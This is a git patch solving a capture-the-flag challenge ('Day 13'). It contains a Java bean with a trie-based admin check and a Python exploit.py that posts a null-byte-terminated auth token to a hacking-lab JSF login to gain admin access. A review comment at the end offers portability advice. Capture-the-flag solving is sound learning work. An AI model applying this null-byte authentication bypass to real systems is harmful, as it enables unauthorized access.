From 97efd59a23fa0be3b64d9d09fbf4a06398004f68 Mon Sep 17 00:00:00 2001 From: Roman Hergenreder Date: Fri, 13 Dec 2019 21:33:46 +0100 Subject: [PATCH] Day 13 solved --- Day 13/NotesBean.java | 26 ++++++++++++++------------ Day 13/exploit.py | 34 ++++++++++++++++++++++++++++++++++ 2 files changed, 48 insertions(+), 12 deletions(-) create mode 100644 Day 13/exploit.py diff --git a/Day 13/NotesBean.java b/Day 13/NotesBean.java index a08e836..b6e678f 100644 --- a/Day 13/NotesBean.java +++ b/Day 13/NotesBean.java @@ -16,7 +16,7 @@ import org.apache.commons.io.IOUtils; public class NotesBean implements Serializable { /** - * + * */ private PatriciaTrie trie = init(); private static final long serialVersionUID = 1L; @@ -42,18 +42,20 @@ public class NotesBean implements Serializable { public void setTrie(String note) { trie.put(unescapeJava(note), 0); } + + private static PatriciaTrie init(){ + PatriciaTrie trie = new PatriciaTrie(); + trie.put(securitytoken,0); - private static PatriciaTrie init(){ - PatriciaTrie trie = new PatriciaTrie(); - trie.put(securitytoken,0); - return trie; - } + return trie; + } - private static boolean isAdmin(PatriciaTrie trie){ - return !trie.containsKey(securitytoken); - } + private static boolean isAdmin(PatriciaTrie trie){ + return !trie.containsKey(securitytoken); + } + + private static InputStream getStreamFromResourcesFolder(String filePath) { + return Thread.currentThread().getContextClassLoader().getResourceAsStream(filePath); + } - private static InputStream getStreamFromResourcesFolder(String filePath) { - return Thread.currentThread().getContextClassLoader().getResourceAsStream(filePath); - } } diff --git a/Day 13/exploit.py b/Day 13/exploit.py new file mode 100644 index 0000000..53a5695 --- /dev/null +++ b/Day 13/exploit.py 
@@ -0,0 +1,34 @@
+#!/usr/bin/python
+
+import requests
+from bs4 import BeautifulSoup as bs
+
+URL = "http://whale.hacking-lab.com:8888/trieme/index.xhtml"
+
+session = requests.session()
+
+# Get view state
+response = session.get(URL)
+if response.status_code != 200:
+ print("Server returned %d %s" % (response.status_code, response.reason))
+ exit(1)
+
+html = bs(response.text, 'lxml')
+viewState = html.find("input", { "id": "javax.faces.ViewState" })
+if viewState is None:
+ print("Could not find javax.faces.ViewState")
+ exit(2)
+
+params = {
+ "j_idt14": "j_idt14",
+ "j_idt14:j_idt15": "login",
+ "j_idt14:name": "auth_token_4835989\0",
+ "javax.faces.ViewState": viewState['value']
+}
+
+response = session.post(URL, data=params)
+if response.status_code != 200:
+ print("Server returned %d %s" % (response.status_code, response.reason))
+ exit(1)
+
+print(response.text)
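Review bot: The parser name on the `html = bs(response.text, 'lxml')` line makes the script depend on lxml, which is neither imported nor mentioned next to `requests`/`bs4`, so on a host without it BeautifulSoup raises FeatureNotFound before any request logic runs; `html = bs(response.text, 'html.parser')` uses the interpreter's built-in parser and needs no extra package. The `exit(1)`/`exit(2)` calls rely on the site-module builtin, which is not guaranteed to exist under `python -S` or in embedded interpreters; `import sys` plus `sys.exit(...)` is the portable form. The form field ids `j_idt14` and `j_idt14:j_idt15` are JSF-generated component ids that change whenever the page structure changes, and `viewState['value']` assumes the hidden input carries a `value` attribute, so a short comment recording that these were taken from the rendered form would help the next reader understand why the script can stop working without any change on its side.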